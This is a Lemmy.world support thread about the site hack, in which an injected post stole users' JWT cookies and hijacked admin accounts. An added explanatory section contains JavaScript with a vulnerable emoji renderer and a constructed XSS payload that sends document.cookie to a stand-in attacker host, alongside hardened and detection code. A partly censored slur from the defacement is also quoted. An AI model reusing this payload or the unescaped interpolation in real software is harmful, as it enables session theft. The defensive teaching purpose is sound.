When logging into lemmy.world the banner now says “Israel - ni**a style” (full word unredacted) and it starts linking to lemon party and a bunch of other NSFW sites.

0 points

Good job on the cleanup.

I’m not seeing any issues anymore, at least from my end.

0 points

Just got another redirect, it’s definitely still happening.

1 point

Based on the Github / Rudd’s new post, it looks like there was an “Evil Post” that contained a Markdown-to-JavaScript escape and actually allowed the hacker to run JavaScript in our web browsers. Something to do with custom emojis?

So the problem was multi-fold.

  1. The hacker created the “Evil Post”, which was constantly stealing people’s cookies. Anyone who viewed the evil post in a web browser (Chrome/Firefox/Edge) gave the hacker access to their account (and anything you can do in the web browser).

  2. The hacker waited until an admin viewed the post, then took control of the administrator’s account, and likely a few other people’s accounts as well. DMs containing the evil-JavaScript post were sent to various moderators.

  3. Hacker used the account access to just troll us.


Fixing #3 doesn’t fix #2 or #1. So eventually, when #3 was fixed, the hacker just grabbed the admin account and put everything back the way it was.

The problem wouldn’t be fixed permanently until #3, #2, and #1 were all fixed, which they seem to be now. But this “evil post” is going around the Federation. Other Lemmy instances may have the post cached, and the users on those Lemmies will likely have their JWT cookie stolen too (allowing the hacker to take over people’s accounts on those instances in a similar manner).

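An added illustration of the bug class the comment above describes, written for this page and not taken from Lemmy’s code. It models a Markdown renderer that expands custom-emoji shortcodes into `<img>` tags by string interpolation (so attacker-controlled emoji metadata can break out of an attribute and run script in every viewer’s browser), beside a hardened version, plus a check of the session cookie’s flags. The emoji table, the `:shortcode:` syntax, the URLs, the payload and the `jwt=` cookie lines are all constructed for the example; nothing here claims to reproduce the exact Lemmy payload.

```javascript
// Constructed custom-emoji table, as an instance might store it. Whoever
// controls this row (an admin, or an attacker holding a stolen admin
// session) controls the alt text that ends up in every reader's page.
const EMOJI = {
  wave: { url: "https://example.invalid/e/wave.png", alt: "waving hand" },
  evil: {
    url: "https://example.invalid/e/x.png",
    // Closes the alt="" attribute early, then adds an event handler that
    // exfiltrates document.cookie (the JWT, if it is readable by script).
    alt: '" onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)',
  },
};

// Escape the five characters that matter inside HTML text and attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// VULNERABLE: interpolates url and alt verbatim. Markdown-to-HTML escape.
function renderEmojiVulnerable(markdown) {
  return markdown.replace(/:([a-z0-9_]+):/g, (m, name) => {
    const e = EMOJI[name];
    if (!e) return m;
    return `<img class="emoji" src="${e.url}" alt="${e.alt}">`;
  });
}

// HARDENED: every attribute value is escaped and the image URL must parse
// and be https. Unknown shortcodes are left as plain text.
function renderEmojiSafe(markdown) {
  return markdown.replace(/:([a-z0-9_]+):/g, (m, name) => {
    const e = EMOJI[name];
    if (!e) return m;
    let src;
    try { src = new URL(e.url); } catch { return m; }
    if (src.protocol !== "https:") return m;
    return `<img class="emoji" src="${escapeHtml(src.href)}" alt="${escapeHtml(e.alt)}">`;
  });
}

// Attribute names of one tag, honouring quoted values so that an escaped
// " onerror=" inside an attribute is not mistaken for a real attribute.
// Good enough for the tags this example emits; a real pipeline should run a
// proper sanitizer (e.g. DOMPurify) rather than regexes.
function attributeNames(tagHtml) {
  const body = tagHtml.replace(/^<[a-zA-Z][\w-]*/, "").replace(/\/?>$/, "");
  const re = /([a-zA-Z_:][\w:.-]*)\s*(?:=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(body)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Crude review check over rendered HTML: list every on* handler attribute.
function eventHandlerAttributes(html) {
  const found = [];
  for (const tag of html.match(/<[a-zA-Z][^>]*>/g) || []) {
    for (const name of attributeNames(tag)) {
      if (name.startsWith("on")) found.push(name);
    }
  }
  return found;
}

// Which hardening flags a Set-Cookie line lacks. HttpOnly is what stops
// document.cookie exfiltration; Secure and SameSite limit other abuse.
function missingCookieFlags(setCookie) {
  const attrs = setCookie.split(";").slice(1)
    .map((a) => a.trim().split("=")[0].toLowerCase());
  const missing = [];
  if (!attrs.includes("httponly")) missing.push("HttpOnly");
  if (!attrs.includes("secure")) missing.push("Secure");
  if (!attrs.includes("samesite")) missing.push("SameSite");
  return missing;
}

// Stand-alone demonstration.
console.log(renderEmojiVulnerable("hi :evil:"));
console.log("handlers (vulnerable):", eventHandlerAttributes(renderEmojiVulnerable("hi :evil:")));
console.log(renderEmojiSafe("hi :evil:"));
console.log("handlers (hardened):", eventHandlerAttributes(renderEmojiSafe("hi :evil:")));
console.log("cookie missing:", missingCookieFlags("jwt=abc; Path=/"));
```

Two caveats worth keeping in mind when reading the comment’s three-step account. Marking the JWT cookie HttpOnly only removes the `document.cookie` exfiltration path; script injected this way still runs with the victim’s session and can call the instance’s API directly, which is why escaping at render time (or a real sanitizer on the output) is the fix, not the cookie flag. And because step 1 hands out working sessions, cleaning up the defacement (step 3) without invalidating the stolen sessions lets the attacker walk straight back in, which is exactly the loop the comment describes.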

Lemmy.world Support

!support@lemmy.world